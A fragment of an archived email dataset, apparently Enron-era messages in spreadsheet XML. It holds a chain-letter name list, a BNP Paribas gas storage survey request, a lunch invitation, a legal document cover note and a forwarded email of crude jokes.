&gt; &gt;&gt;&gt;&gt; &gt;41. Amanda Prater...............McLeansboro,IL_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;42. Karon Blaise................Murfreesboro,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;43. Kristin Hawkins.............Manchester,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;44. Chad Cozart.................Manchester,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;45. Amber Bowman................Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;46. MARCIE RAMSEY...............ALGOOD,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;47. Melissa Rodgers.............Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;48. Matt Rezny..................Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;49. Rachael Crook...............Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;50. Samantha Smith..............Cookeville, TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;51. Jessica DiStefano...........Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;52. Charlotte Schmitt-Matzen....Cookeville,TN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;53. Brittany Henry..............Cookeville,TN._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;54. Tiffany Henley..............Cookeville,TN._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;55. Sue Henley..................Cookeville,TN._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;56. Andrea Smith................Ottawa,ON CANADA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;57. George Saab.................Beirut,LEBANON_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;58. Melody Burkholder...........Plainville,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;59. Peggy Carlson...............Savonburg,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;60. Nancy Bailey................Parsons,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;61. Shirley Antes...............Emporia,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;62. Sharon Holle................Emporia,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;63. Peggy Blackwell.............Aurora,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;64. Karen Flood.................Emporia,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;65. Carol Mains.................Emporia,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;66. Sara Sage...................Madison,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;67. Emily Sage..................Madison,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;68. Constance Smith.............Madison,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;69. Kirstie Skelton.............Perry,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;70. Kevin D. Sieker.............Ellinwood,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;71. Sharon Boyer................Olathe,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;72. Sara Elizabeth Graber.......Hutchinson,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;73. Matt Dunn...................Sterling,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;74. Amanda Rene' Bowen..........Louisburg,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;75. Stephanie Angalet...........Louisburg,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;76. Bernadette Miller...........Gainesville,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;77. Amy Kemp....................West Point, NY_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;78. Pam Schon...................Pilot Point,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;79. Katie Koerner ..............Pilot Point,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;80. Tammy Ettredge..............Pilot Point,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;81. MarRissa Inman..............Pilot Point,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;82. Ivy Collier.................Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;83. Stephanie Sayre.............Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;84. Shelly Wren!!...............Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;85. Lilly Pitcher...............Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;86. Chad Peoples................Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;87. Rachel Pryor................Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;88. Megan Allsup ...............Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;89. Sarah Mercer................Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;90. Lindy Morff.................Irving,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;91. Queen La'teefa [Reid].......Cedar Hill,Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;92. Tracy Dodd..................Midlothian,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;93. Caycie Vincent..............Tyler,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;94. Jessica Reitz...............Midlothian,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;95. Brian Ruff..................College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;96. Dat Nguyen..................College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;97. Cathy Jenkins...............College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;98. Glenn Roberts...............College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;99. Lesli Bailey................Colleyville,Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;100. Nicole Reagan..............Dickinson, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;101. William Cervin.............Dallas, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;102. Josh Flores................Dallas,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;103. Chad Bailey................Dallas, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;104. Emily Finch................Allen, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;105. Heather Graves.............Allen, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;106. ASHLEY SMITH...............ALLEN, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;107. JENNIE ANDREWS.............ALLEN, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;108. Heather Iske...............Allen, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;109. Nancy Iske.................Allen, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;110. Julie Dixon................Rockwall, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;112. Jim Harrington.............Rockwall, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;113. Michael Manley.............Rockwall, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;114. Lindsay Bossert............Bedford, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;115. Catherine T................Ft. Worth,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;116. Susan S. ..................Ft. Worth, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;117. Julie Alexander............Arlington, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;118. Randy Sh...................Arlington, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;119. Jessica Shaw...............Mansfield, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;120. Matt Young.................The Colony, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;121. Ivy Bedgood................The Colony, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;122. Sherman Gardner............The Colony, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;123. Randy Dunn.................Belvidere, IL_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;124. Karen Dunn.................Belvidere, IL_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;125. Kari Knox..................Vernon, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;126. Michelle Baxter............Vernon, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;127. Amber Yoakum...............Vernon, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;128. Amber Renee Garvin.........Vernon, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;129. Rusty Keaton...............Lockney,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;130. April Dorman...............Lockney, Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;131. Amber Dorman...............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;132. Johnny Dorman..............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;133. Julie Dorman...............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;134. Cindy Cotham..............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;135. Phil Cotham...............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;136. Landon Cotham.............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;137. Todd Cotham...............Lockney, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;138. Penny Ogden...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;139. Larry Ogden...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;140. Misty Seymour..............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;141. Dean Seymour...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;142. Erika Miller...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;143. Bonnie Dunlap.............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;144. Cienna Carthel.............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;145. Cindy DuBois...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;146. Melinda Eubanks............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;147. Gail DuBois................Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;148. Craig DuBois...............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;149. Nathan Whittle.............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;150. Christie Whittle...........Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;151. Zach Nutt..................Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;152. Stacy Nutt.................Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;153. Mitch Ross.................Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;154. Becky Ross.................Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;155. Aric Hendricks.............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;156. Lori Hendricks.............Floydada, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;157. Ashley Allcorn.............Winters, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;158. Vince Thompson.............Waco, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;159. Warren Moorman.............Cedar Park, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;160. Cindy Pitcox...............Austin, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;161. Sherri Tally...............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;162. Dale Tally.................Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;163. Dustin Tally...............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;164. Sheri Solis................Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;165. Joe Ray Solis..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;166. Bradd Raybion..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;167. Brentt Raybion.............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;168. Cayce Raybion..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;169. Blair Raybion..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;170. Blake Raybion..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;171. Jima Walker................Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;172. Carter McBee...............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;182. Tallie Wright..............Brady, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;183. Tara Dobbs.................Monroe, MI_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;184. Jacob W....................Granbury,Tx_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;185. Tamara G...................Colorado Springs, CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;186. Aubrey S...................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;187. David Woje.................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;188. Jon Dennis................Castle Rock, CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;189. Ruth Seeliger..............Winfield, KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;190. Andrea Deepe...............Hayden, CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;191. Shai.......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;192. Grace......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;193. Tammi......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;194. Bill.......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;195. Jeremy.....................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;196. Zachary....................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;197. Abby.......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;198. Danny......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;199. Kathy......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;200. Jerod......................CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;201. Jennifer Gould.............Monett, MO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;202. Brooklyn Wilkins ..........Grand Junction, CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;203. Stephanie Hurd.............Craig CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;204. Ryan Carroll...............Grand Junction, CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;205. Kathy Galinak..............Abilene, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;206. Bob Galinak................Abilene, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;207. Roy Galinak................Abilene, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;208. Ben Galinak................Abilene, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;209. Hannah Watson..............Abilene, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;210. John Watson................Abilene TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;211. Necia Trapp................Amarillo TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;212. Van Trapp..................Amarillo, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;213. David Marricle.............Muleshoe, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;214. Terry Marricle.............Muleshoe, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;215. Kim Sanders................Hereford, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;216. Ally Paetzold..............Hereford, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;217. Stacy Schenk...............Vega, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;218. John Peil..................Darrouzett, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;219. Aaron Howard...............Darrouzett, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;220. Leah Cates.................Darrouzett, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;221. Josh Robertson.............Darrouzett, TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;222. Kris Webb..................Fargo, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;223. Kara Sue Bentley...........Shattuck,OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;224. An~a Shanks................Oklahoma_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;225. Carly Schwerdtfeger........Waynoka, Ok_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;226. Ciera Staats...............Alva, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;227. Michael Hommertzheim.......Medicine Lodge,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;228. Jarett Cahoj...............Medicine Lodge,KS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;229. Morgan Schoeling...........Alva, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;230. Maggie Schoeling...........Alva, OK._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;231. Ashley Reimer..............Decatur, AR_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;232. Sarah Owens................Fox, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;233. Yvonne Merilice............Tatums, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;234. Franci Kilcrease...........Durant, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;235. Mandy Smith................Ada, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;236. Amber Branch...............Tishomingo, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;237. Tisha Killian..............Tishomingo, OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;238. Ashley Powers..............Valliant OK_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;239. Te Wilson..................Tishomingo, Ok_x000D_
&gt; &gt;&gt;&gt;&gt;_&gt;240. Beverly Medcalf............Ada, OK_x000D_
&gt; &gt;&gt;    241. Kris Jones.................Asher, OK(Richland Hills, TX)_x000D_
&gt; &gt;&gt;____242. Cris.......................Leedey, OK_x000D_
&gt;       243. Marcia T. .................Leedey, Ok_x000D_
   244. Ronnie Brickman............Claude, TX. _x000D_
&gt;&gt;______245. Angela M.Mendez............Katy, TX_x000D_
   246. Julissa Marron.............Houston, _x000D_
TX____________________________________________</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 05:58:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'george.ellis@americas.bnpparibas.com'})</t>
  </si>
  <si>
    <t>BNP PARIBAS Commodity Futures Weekly AGA Survey</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Good Morning,_x000D_
_x000D_
Please provide your estimate for this week's AGA storage survey._x000D_
_x000D_
Here are this week's stats:_x000D_
_x000D_
AGA Last Year       -128_x000D_
5 yr AVG            -142_x000D_
Lifetime High            -242 2000_x000D_
Lifetime Low             -78  1999_x000D_
Gas in STGE              2405_x000D_
5yr AVG             1801_x000D_
+/- to 2001              +1036_x000D_
+/- to 5yr AVG           +604_x000D_
_x000D_
Please have your estimates in by 12:00 (11:00 CST) Wednesday.  Thank you._x000D_
_x000D_
(Embedded image moved to file: pic25996.pcx)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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_x000D_
_x000D_
 - pic25996.pcx </t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 12:47:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'djunus2000@yahoo.com'})</t>
  </si>
  <si>
    <t>_x000D_
How about Friday, March 1st at 12:30PM at Mama Ninfa's_x000D_
on Kirby? _x000D_
_x000D_
David Junus_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Greetings - Send FREE e-cards for every occasion!_x000D_
http://greetings.yahoo.com</t>
  </si>
  <si>
    <t>Thu, 25 May 2000 05:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tracy.mclaughlin@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sue.nord@enron.com', 'lisa.yoho@enron.com', 'marcia.linton@enron.com', 'stephen.burns@enron.com', 'jeff.dasovich@enron.com', 'xi.xi@enron.com', 'james.steffes@enron.com', 'chris.long@enron.com', 'marchris.robinson@enron.com', 'donald.lassere@enron.com', 'susan.landwehr@enron.com', 'joseph.alamo@enron.com', 'scott.bolton@enron.com'})</t>
  </si>
  <si>
    <t>Preso</t>
  </si>
  <si>
    <t>Michael Smythe's presentation_x000D_
_x000D_
Tracy J. McLaughlin_x000D_
Enron Broadband Services_x000D_
Government Affairs Coordinator_x000D_
(503) 886-0396 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Tracy McLaughlin/Enron Communications on 05/25/00 12:32 PM _x000D_
-----_x000D_
_x000D_
	Michael Smythe_x000D_
	05/23/00 01:12 PM_x000D_
		 _x000D_
		 To: Tracy McLaughlin/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Preso_x000D_
_x000D_
here you go_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael Smythe_x000D_
Enron Broadband Services_x000D_
michael_smythe@enron.net_x000D_
office 503 886 0306_x000D_
cel 503 880 0186</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 11:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'lisa.bills@enron.com', 'mgocker@enron.com', 'sheila.tweed@enron.com', 'toxley@winston.com', 'mmckay@velaw.com', 'sarah.wesner@enron.com', 'roseann.engeldorf@enron.com', 'catherine.clark@enron.com'})</t>
  </si>
  <si>
    <t>E-Next Generation Assignment Documents and Schedule V</t>
  </si>
  <si>
    <t>Attached please find revised drafts of the following documents:_x000D_
_x000D_
1.  Purchase Option Assignment and Assumption Agreement (LM6000)_x000D_
2.  Purchase Option Assignment and Assumption Agreement (Pastoria)_x000D_
3.  Schedule V to Participation Agreement_x000D_
_x000D_
Both a clean copy and a copy blacklined to show the changes from the_x000D_
prior version are included for each of these documents._x000D_
_x000D_
Please feel free to call me if you have any questions or comments._x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~_x000D_
Sean Bunk_x000D_
Andrews &amp; Kurth L.L.P._x000D_
600 Travis St., Suite 4200_x000D_
Houston, Texas  77002_x000D_
Tel.:  713.220.4427_x000D_
Fax.: 713.238.7252_x000D_
e-mail: seanbunk@andrews-kurth.com_x000D_
_x000D_
This e-mail is privileged and confidential and is intended only for the_x000D_
recipient(s) named above.  If you are not the intended recipient, please_x000D_
(i) do not read, copy, use or disclose the contents hereof to others_x000D_
(any of the foregoing being strictly prohibited), (ii) notify the sender_x000D_
immediately of your receipt hereof, and (iii) delete this e-mail and all_x000D_
copies of it._x000D_
_x000D_
 &lt;&lt;Blackline 593717v3 to v2 (Pastoria Assignment).DOC&gt;&gt;  &lt;&lt;Purchase_x000D_
Option Assignment and Assumption Agreement - Pastoria.DOC&gt;&gt;  &lt;&lt;Blackline_x000D_
593834v4 to v3 (LM6000 Assignment - N.A.).DOC&gt;&gt;  &lt;&lt;Purchase Option_x000D_
Assignment and Assumption Agreement (Turbopark - LM6000).DOC&gt;&gt;_x000D_
&lt;&lt;Schedule V to Participation Agreement (TurboPark).DOC&gt;&gt;  &lt;&lt;Blackline_x000D_
597234v2 to v1 (Sched. V - Turbo Park).DOC&gt;&gt; _x000D_
 - Blackline 593717v3 to v2 (Pastoria Assignment).DOC_x000D_
 - Purchase Option Assignment and Assumption Agreement - Pastoria.DOC_x000D_
 - Blackline 593834v4 to v3 (LM6000 Assignment - N.A.).DOC_x000D_
 - Purchase Option Assignment and Assumption Agreement (Turbopark - _x000D_
LM6000).DOC_x000D_
 - Schedule V to Participation Agreement (TurboPark).DOC_x000D_
 - Blackline 597234v2 to v1 (Sched. V - Turbo Park).DOC</t>
  </si>
  <si>
    <t>Fri, 14 Apr 2000 08:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicholas.stephan@enron.com', 'sunil.dalal@enron.com'})</t>
  </si>
  <si>
    <t>Some good ones</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 04/14/2000 03:20 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kenneth D'Silva_x000D_
04/14/2000 02:59 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Some good ones_x000D_
_x000D_
These are pretty good too..._x000D_
---------------------- Forwarded by Kenneth D'Silva/HOU/ECT on 04/22/2000 _x000D_
02:58 PM ---------------------------_x000D_
_x000D_
_x000D_
"D'Souza, Deepak J" &lt;d'souzdj@bp.com&gt; on 04/11/2000 04:03:07 PM_x000D_
To: "'kdsilva@enron.com'" &lt;kdsilva@enron.com&gt;, "'nazareth@rice.edu'" _x000D_
&lt;nazareth@rice.edu&gt;, "'deshazer@rice.edu'" &lt;deshazer@rice.edu&gt;, _x000D_
"'aylmerrebello@hotmail.com'" &lt;aylmerrebello@hotmail.com&gt;, _x000D_
"'rodribra@yahoo.com'" &lt;rodribra@yahoo.com&gt;_x000D_
cc:  _x000D_
Subject: Some good ones_x000D_
_x000D_
_x000D_
&gt; This guy went to the zoo one day. While he was standing in_x000D_
&gt; front of the gorilla's enclosure, the wind gusted and he got_x000D_
&gt; some grit in his eye._x000D_
&gt;_x000D_
&gt; As he pulled his eyelid down to dislodge the particle, the_x000D_
&gt; gorilla went crazy, bent open the bars, and beat the guy_x000D_
&gt; senseless._x000D_
&gt;_x000D_
&gt; When the guy came to, the zookeeper was anxiously bending over_x000D_
&gt; him, and as soon as he was able to talk, he explained what had_x000D_
&gt; happened._x000D_
&gt;_x000D_
&gt; The zookeeper nodded and explained that in 'gorilla language',_x000D_
&gt; pulling down your eyelid means "Fuck you"._x000D_
&gt;_x000D_
&gt; This didn't make the gorilla's victim feel any better and he_x000D_
&gt; vowed revenge._x000D_
&gt;_x000D_
&gt; The next day he purchased two large knives, two party hats, two_x000D_
&gt; party horns, and a large sausage. Putting the sausage in his_x000D_
&gt; pants, he hurried to the zoo and over to the gorilla's cage,_x000D_
&gt; into which he tossed a hat, a knife, and a party horn._x000D_
&gt;_x000D_
&gt; Knowing that the big apes were natural mimics, he put on a_x000D_
&gt; party hat. The gorilla looked at him, looked at the hat, and_x000D_
&gt; put it on._x000D_
&gt;_x000D_
&gt; Next he picked up his horn and blew on it. The gorilla picked_x000D_
&gt; up his horn and did the same._x000D_
&gt;_x000D_
&gt; Then the man picked up his knife, whipped the sausage out of_x000D_
&gt; his pants, and sliced it neatly in two._x000D_
&gt;_x000D_
&gt; The gorilla looked at the knife in his cage, looked down at_x000D_
&gt; his own penis, and he..._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; scroll down_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;                         ...pulled down his eyelid._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; *****************************************************************_x000D_
&gt; More of those Rejected Hallmark Cards:_x000D_
&gt;_x000D_
&gt; 1. Looking back over the years that weve been together, I can't help but_x000D_
&gt; wonder:  What the !@#$ was I thinking?_x000D_
&gt;_x000D_
&gt; 2. Congratulations on your wedding day! Too bad no one likes your wife._x000D_
&gt;_x000D_
&gt; 3. How could two people as beautiful as you have such an ugly baby?_x000D_
&gt;_x000D_
&gt; 4. I've always wanted to have someone to hold, someone to love. After_x000D_
&gt; having_x000D_
&gt; met you, I've changed my mind._x000D_
&gt;_x000D_
&gt; 5. I must admit, you brought Religion in my life. I never believed in Hell_x000D_
&gt; 'til I met you._x000D_
&gt;_x000D_
&gt; 6. As the days go by, everyday I think of how lucky I am that you're not_x000D_
&gt; here to ruin it for me._x000D_
&gt;_x000D_
&gt; 7. If I get only one thing for Christmas, I hope it's your sister._x000D_
&gt;_x000D_
&gt; 8. As you grow older, Mom, I think of all the gifts you've given me. Like_x000D_
&gt; the need for therapy..._x000D_
&gt;_x000D_
&gt; 9. Thanks for being a part of my life!!! I never knew what evil was before_x000D_
&gt; this!_x000D_
&gt;_x000D_
&gt; 10. Congratulations on your promotion. Before you go, would you like to_x000D_
&gt; take_x000D_
&gt; this knife out of my back?  Youll probably need it again._x000D_
&gt;_x000D_
&gt; 11. Someday I hope to get married, but not to you._x000D_
&gt;_x000D_
&gt; 12. Happy Birthday! You look great for your age...Almost Lifelike!_x000D_
&gt;_x000D_
&gt; 13. When we were together, you always said you'd die for me. Now that_x000D_
&gt; we've_x000D_
&gt; broken up, I think its time you kept your promise._x000D_
&gt;_x000D_
&gt; 14. I knew the day would come when you would leave me for my best friend._x000D_
&gt; So here's his leash, water bowl and chews._x000D_
&gt;_x000D_
&gt; 15. We have been friends for a very long time, what do you say we call it_x000D_
&gt; quits?!_x000D_
&gt;_x000D_
&gt; 16. I'm so miserable without you, its almost like you're here._x000D_
&gt;_x000D_
&gt; 17. Congratulations on your new bundle of joy. Did you ever find out who_x000D_
&gt; the_x000D_
&gt; father was?_x000D_
&gt;_x000D_
&gt; 18. You are such a good friend that if we were on a sinking ship and there_x000D_
&gt; was only one life jacket.... I'd miss you heaps and think of you often._x000D_
&gt;_x000D_
&gt; 19. Your friends and I wanted to do something special for your birthday,_x000D_
&gt; so_x000D_
&gt; we're having you put to sleep._x000D_
&gt;_x000D_
